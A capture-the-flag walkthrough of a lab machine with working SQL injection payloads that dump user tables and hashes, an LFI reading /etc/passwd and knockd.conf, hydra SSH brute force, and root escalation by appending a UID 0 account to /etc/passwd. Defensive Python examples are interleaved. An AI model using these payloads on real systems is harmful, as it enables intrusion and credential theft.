Initial foothold
1. Network discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.49.
2. Port scan
nmap -Pn 10.0.2.49
nmap -Pn -p1000- 10.0.2.49
There’s one filtered port, 22, and one open port, 80.
3. OS and service scan
nmap -A -p22,80 10.0.2.49
There’s Apache httpd 2.4.38 on port 80.
4. Vuln scan
nmap --script vuln -p22,80 10.0.2.49
Nothing.
Service Enumeration
HTTP service
1. Nikto scan
nikto -h http://10.0.2.49
2. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q
3. Access HTTP site
/index.php
/display.php
/search.php -> possible SQL injection
/manage.php -> possible SQL injection
It’s funny that when I accessed session.php and logout.php, I was redirected to manage.php and had an admin session.
Conclusion:
There’re two possible SQLi vulnerabilities to test, in search.php and manage.php.
If you do very good reconnaissance and discover that logout.php redirects to manage.php w/ an admin session, it will save a lot of time. However, I will demonstrate how to test for SQLi starting from search.php.
Exploitation
1. Supply an input
2. Intercept w/ Burp Suite
3. Send to the intruder
In the right panel -> Clear $
Double-click “test” and click “Add $” in the right panel
Set up the payload. This payload is based on my experience. I already uploaded it on Github.
Here’s my Github link.
Start the attack. Here’s the result. In this case, you will see the difference in length. Let’s check it out.
Test the payload. I will use:
' or 1=1--
Here’s the result.
4. Next, test a union query to find the number of columns
Change the value to be:
' union select 1--
Add $ on “1”
Load the payload
Here’s the GitHub link.
Start the attack; the column count is six.
Test the payload
' union select 1,2,3,4,5,6--
Succeeded!!!
5. Find the version, hostname, current database
' union select 1,@@version,@@hostname,database(),5,6--
Note it.
6. Get other databases
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
I don't have any results.
Fix this by changing the comment style, according to the Intruder attack result.
I will change from:
-- to -- -
Here’s the new query:
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -
Result.
Note it.
7. “Staff” schema
Get table name
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -
Note it
Get columns
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users' and table_schema='Staff'-- -
Note it
Get data
' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -
Note it
Crack the hash w/ crackstation
8. “users” schema
Get tables
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -
Get columns
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails' and table_schema='users'-- -
Get data
' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -
View page source
Copy, organize and save it as raw.txt
Extract only usernames and save as users.txt
cat raw.txt | cut -d ":" -f2 > users.txt
cat users.txt
Extract only passwords and save as passwords.txt
cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txt
cat passwords.txt
Conclusion:
This database has a data structure like this:
Database -> Tables -> Columns
- Staff -> StaffDetails, Users -> UserID, Username, Password
Data:
1:admin:856f5de590ef37314e7c3bdf6f8a66dc
Crack the hash -> transorbital1
- users -> UsersDetails -> id,firstname,lastname,username,password,reg_date
Data is saved as raw.txt
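The queries above only work because search.php concatenates the search term straight into its SQL statement. The following Python script is an added example, not code from the writeup or from the target machine: it reproduces the defect against an in-memory SQLite table with constructed sample rows and puts the hardened, parameterized version beside it. The table name Users and the columns UserID, Username, Password follow the writeup; the row values and hashes are placeholders.

```python
import sqlite3

# Constructed sample rows; the hashes are placeholders, not values from the writeup.
SAMPLE_USERS = [
    (1, "admin", "<md5-placeholder-1>"),
    (2, "alice", "<md5-placeholder-2>"),
    (3, "bob", "<md5-placeholder-3>"),
]


def make_db():
    """Build an in-memory table shaped like the Staff.Users table named in the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, term):
    """Concatenates the term into the statement: the term can change the query's grammar."""
    sql = f"SELECT UserID, Username FROM Users WHERE Username LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Binds the term as a parameter: it is only ever compared as a string value."""
    sql = "SELECT UserID, Username FROM Users WHERE Username LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def demo():
    """Run the same three inputs through both versions and return the rows each produced."""
    conn = make_db()
    results = {}
    for label, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        results[label] = {
            # ordinary use: both versions return the admin row
            "normal": fn(conn, "adm"),
            # the writeup's first payload: true for every row in the concatenated version
            "tautology": fn(conn, "' or 1=1--"),
            # a two-column UNION that pulls the Password column into the result set
            "union": fn(conn, "' union select UserID, Password from Users--"),
        }
    return results


if __name__ == "__main__":
    for label, rows in demo().items():
        for case, out in rows.items():
            print(f"{label:10} {case:9} -> {out}")
```

The parameterized version returns nothing for both payloads because the whole string, quotes and comment marker included, is compared as a value; the concatenated version returns every row for the tautology and leaks the Password column through the UNION, which is exactly the behaviour the Intruder length differences above revealed.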
9. Searching for an exploit in manage.php
You will see the “File does not exist” string. I bet this is a hint about LFI.
View page source, nothing much.
I will find the parameter w/ wfuzz, but first I need to intercept the page request and copy the Cookie value.
Fuzz w/ wfuzz
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
You will see that there’re many unrelated results, all with a word count (the Word column) of 100.
Hide responses whose word count is 100 by supplying “--hw 100”.
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
Nothing.
Change index.php to “../../../../../etc/passwd”
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwd
Now I got the result.
Test the parameter
Comparing w/ the credentials from raw.txt, I may be able to use these to log in, but SSH is filtered. The likely explanation is a port-knocking function.
The typical port-knocking configuration is located in:
/etc/knockd.conf
Supply it via the LFI. There’s a result.
View page source for easier sequence identification.
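manage.php is exploitable because the value of the fuzzed parameter goes straight into an include. The following Python module is an added example, not the target's PHP, of the two checks a defender would put in front of such an include: an allowlist of page names, and a realpath containment check that rejects the ../../../../../../../etc/passwd and /etc/knockd.conf inputs used above. The web root /var/www/html and the allowlist contents are assumptions; the page names are the ones gobuster found.

```python
import os

# Assumed web root; the allowed page names are those the writeup found with gobuster.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"index.php", "display.php", "search.php", "manage.php"}


def contained_path(base_dir, requested):
    """Return the resolved path of `requested` inside base_dir, or None if it escapes.

    realpath() collapses '..' segments (and symlinks when the path exists), so the
    decision is made on where the path actually lands, not on the string the client sent.
    An absolute `requested` replaces base_dir in os.path.join and is rejected the same way.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def resolve_include(requested, base_dir=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Allowlist first, containment second; returns the path to include or None.

    The allowlist is the decisive control. The containment check is kept as
    defence in depth for applications that must accept sub-paths.
    """
    if requested not in allowed:
        return None
    return contained_path(base_dir, requested)


if __name__ == "__main__":
    # Constructed requests: the inputs the writeup sent plus an allowed page and a
    # traversal that stays inside the root but is not on the allowlist.
    for req in ("index.php", "../../../../../../../etc/passwd",
                "/etc/knockd.conf", "pages/../manage.php"):
        print(f"{req!r:40} -> {resolve_include(req)}")
```

Note that pages/../manage.php would pass the containment check alone, since it resolves inside the web root; only the allowlist rejects it, which is why the allowlist comes first.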
10. Open the filtered port by using the discovered sequence.
for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done
Test the SSH connection; now I can connect to the SSH service.
11. Brute-force the credentials.
hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -u
I got 3 credentials.
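The hydra run above leaves one sshd “Failed password” line per attempt in the target’s auth.log, which is what a defender alerts on. The following Python script is an added example, not part of the writeup: it parses constructed syslog-style sshd lines (shown inline, not captured from the target) and flags any source address with a burst of failures inside a short window, reporting which usernames were tried and which were subsequently accepted from that address. The threshold of 5 failures in 60 seconds is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in auth.log format; hostname, PIDs and addresses are made up.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 target sshd[2101]: Failed password for invalid user bob from 10.0.2.27 port 51000 ssh2
Mar  3 10:15:02 target sshd[2102]: Failed password for invalid user joey from 10.0.2.27 port 51001 ssh2
Mar  3 10:15:03 target sshd[2103]: Failed password for janitor from 10.0.2.27 port 51002 ssh2
Mar  3 10:15:04 target sshd[2104]: Failed password for janitor from 10.0.2.27 port 51003 ssh2
Mar  3 10:15:05 target sshd[2105]: Failed password for fredf from 10.0.2.27 port 51004 ssh2
Mar  3 10:15:06 target sshd[2106]: Accepted password for janitor from 10.0.2.27 port 51005 ssh2
Mar  3 10:20:00 target sshd[2300]: Failed password for alice from 10.0.2.50 port 40000 ssh2
Mar  3 10:20:30 target sshd[2301]: Accepted publickey for alice from 10.0.2.50 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_sshd(text):
    """Yield (timestamp, result, user, ip) for each line the regex recognises."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog lines carry no year; only relative spacing matters here
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]


def find_brute_force(text, threshold=5, window_seconds=60):
    """Flag source IPs with at least `threshold` failures inside any `window_seconds` span.

    Returns {ip: {"failures": total failures from ip,
                  "users": sorted distinct usernames tried,
                  "accepted": sorted usernames accepted from that ip}}.
    """
    failures = defaultdict(list)   # ip -> [(timestamp, user)]
    accepted = defaultdict(set)    # ip -> {user}
    for ts, result, user, ip in parse_sshd(text):
        if result == "Failed":
            failures[ip].append((ts, user))
        else:
            accepted[ip].add(user)

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until events[start..end] fit in the window
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "accepted": sorted(accepted.get(ip, ())),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A single failed login followed by a key-based success (the second address in the sample) is normal behaviour and is not flagged; the first address is, and the “accepted” field tells the responder which account the guessing produced.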
Privilege Escalation
1. I will start w/ janitor
ssh janitor@10.0.2.49
password: Ilovepeepee
ls -la
Lucky me, I found a hidden directory.
cd .secrets-for-putin
ls -la
cat passwords-found-on-post-it-notes.txt
Now I got another set of passwords.
Save it as janitor_password.txt
2. Another round of SSH brute-forcing.
hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u
Starting with “fredf”, log in to the SSH service.
ssh fredf@10.0.2.49
password: B4-Tru3-001
sudo -l
I can run this binary.
Test the command
sudo /opt/devstuff/dist/test/test
Test the usage
echo "Hello World" > for_read
sudo /opt/devstuff/dist/test/test for_read for_append
ls -la
cat for_append
Next, I will append another user w/ a password to /etc/passwd
Create password
openssl passwd -1 -salt new password123
nano strings_to_append
Add the data as shown in the screenshot.
Append /etc/passwd
sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd
Verify /etc/passwd
cat /etc/passwd
Now I got “newuser”.
Login as new user
su newuser
password: password123
cd /root
ls -la
Now I got the flag.
cat theflag.txt
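The privilege escalation works by appending a second UID 0 account, with its hash stored inline, to /etc/passwd through a root-run binary that will write to any destination. The following Python script is an added example, not from the writeup, of the check an integrity monitor or audit job would run over that file: it parses constructed passwd content (the appended line mirrors the technique above but carries a placeholder hash, not the one openssl produced) and reports any non-root UID 0 account, any entry carrying a hash or an empty field instead of an x, and any duplicate UID.

```python
# Constructed /etc/passwd content; the last line mirrors the writeup's appended
# account but uses a placeholder hash, not the value openssl generated.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
janitor:x:1001:1001:janitor:/home/janitor:/bin/bash
fredf:x:1002:1002:fredf:/home/fredf:/bin/bash
newuser:$1$new$PLACEHOLDERHASHxxxxxxxx:0:0:newuser:/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# Values that legitimately appear in the password field: shadowed or locked accounts.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd lines into dicts, keeping line numbers; malformed lines are flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            entries.append({"line": lineno, "malformed": line})
            continue
        entry = dict(zip(FIELDS, parts))
        entry["line"] = lineno
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return a list of (line, account, reason) findings for the given passwd content."""
    findings = []
    seen_uids = {}  # uid -> first account name seen with it
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["line"], None, "malformed entry"))
            continue
        name, pw, uid = e["name"], e["passwd"], e["uid"]
        if not uid.isdigit():
            findings.append((e["line"], name, "non-numeric UID"))
            continue
        if uid == "0" and name != "root":
            findings.append((e["line"], name, "non-root account with UID 0"))
        if pw == "":
            findings.append((e["line"], name, "empty password field (no password required)"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((e["line"], name, "password hash stored in passwd instead of shadow"))
        if uid in seen_uids:
            findings.append((e["line"], name, f"duplicate UID {uid} (also {seen_uids[uid]})"))
        else:
            seen_uids[uid] = name
    return findings


if __name__ == "__main__":
    for line, account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {account}: {reason}")
```

Against the constructed content every finding points at the appended line, which is the signal a file-integrity check on /etc/passwd would have raised the moment the append above happened; the same parser runs unchanged over a real copy of the file.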